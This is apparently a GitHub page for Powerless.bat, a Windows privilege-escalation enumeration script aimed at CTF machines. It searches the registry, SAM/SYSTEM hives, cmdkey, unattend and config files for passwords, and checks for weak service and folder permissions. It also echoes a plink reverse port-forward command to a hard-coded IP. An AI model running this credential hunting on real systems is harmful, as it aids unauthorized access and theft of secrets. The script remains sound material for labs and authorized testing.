-
Notifications
You must be signed in to change notification settings - Fork 132
/
Powerless.bat
247 lines (210 loc) · 12.4 KB
/
Powerless.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
@echo off
set userprofile=%cd%
mode con:cols=160 lines=9999
Cd c:\
echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
:: https://github.com/GDSSecurity/Windows-Exploit-Suggester
systeminfo
echo.
echo ----- Architecture -------
SET Processor
echo.
echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
:: Note, in CTF boxes its not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that users rights, pay close attention to their user folder.
echo Current User: %username%
whoami /all
echo --- All users, accounts and groups ---
net users
net accounts
net localgroup
echo ------- Administrators --------
net localgroup administrators
echo ------- Environment Variables -------
set
echo.
echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.
echo ---------------------------------------- Search for Quick Wins --------------------------------------
echo -------- Listing contents of user directories ---------
:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that maybe used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script).
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.
echo -------- Exploring program directories and C:\ ---------
:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.
echo --- Program Files ---
dir "C:\Program Files" /b
echo --- Program Files (x86) ---
dir "C:\Program Files (x86)" /b
echo --- Root of C:\ ----
dir "C:\" /b
echo.
echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---
:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless.
dir /a /b C:\inetpub\
echo --- Broad search for Apache or Xampp ---
dir /s /b apache* xampp*
echo.
echo ---Search for Configuration and sensitive files---
echo -- Broad search for config files --
:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more youll learn which files can be ignored, and which you should give a closer eye to.
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo -- Application Host File --
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo -- Broad search for unattend or sysprep files --
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo -- Stored Passwords --
:: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")
cmdkey /list
echo.
echo -- Checking for any accessible SAM or SYSTEM files --
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.
echo -- Broad search for vnc kdbx or rdp files --
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.
echo --- Searching Registry for Passwords ---
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.
echo --- AlwaysInstallElevated Check ---
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.
echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---
where /q icacls
IF ERRORLEVEL 1 (
echo icacls is missing, performing checks using cacls for older versions of Windows
FOR /F "tokens=* USEBACKQ" %%F IN (`where cacls`) DO (SET cacls_exe=%%F)
) ELSE (
FOR /F "tokens=* USEBACKQ" %%F IN (`where icacls`) DO (SET cacls_exe=%%F)
)
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ---Domain joined? If so check domain controller for GPP files ----
set user
echo.
cd %userprofile%
echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---
REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.
echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f
echo --- Accesschk World writeable folders and files ----
accesschk.exe -uwdqs "Users" c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
echo.
echo --- Accesschk services with weak permissions ---
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.
echo --- Accesschk services that we can change registry values for (such as ImagePath) ---
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
echo.
echo ---------------------------------------- End Search for Quick Wins --------------------------------------
cd c:\
echo ------- Powershell existence/version check -------
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
echo ------- Network shares -------
net share
echo ------- Programs that run at startup ------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
wmic startup get caption,command
echo -------- Path (is dll hijacking possible?) ------
echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...
echo %path%
echo.
:: I couldnt find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script
:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1
:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"
:: Or let the script do all the work for you
:: powershell.exe -executionpolicy bypass -file folderperm.ps1
echo ------- Scheduled Tasks Names Only -------
:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it).
schtasks /query /fo LIST 2>nul | findstr "TaskName"
echo.
echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.
echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------
net start
echo.
echo ------- Link Running Processes to started services --------
tasklist /SVC
echo.
echo ------- Processes verbose output (who is running what?) --------
:: Pay close attention to this list. Especially for those tasks run by a user other than your own.
tasklist /v
echo.
echo ------- Patches (also listed as part of systeminfo) -------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case its important to have this fallback.
wmic qfe get Caption,Description,HotFixID,InstalledOn
echo ------- Firewall ------
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump
echo ------ Network information ------
ipconfig /all
:: Routing and ARP tables accessible with these commands... uncomment if you wish, I didnt typically find them helpful for priv esc.
REM route print
REM arp -A
echo.
echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
echo.
echo --- Broad search for any possible config files which may contain passwords ---
:: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).
dir /s /b *pass* *cred* *vnc* *.config*
echo.
echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --"
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.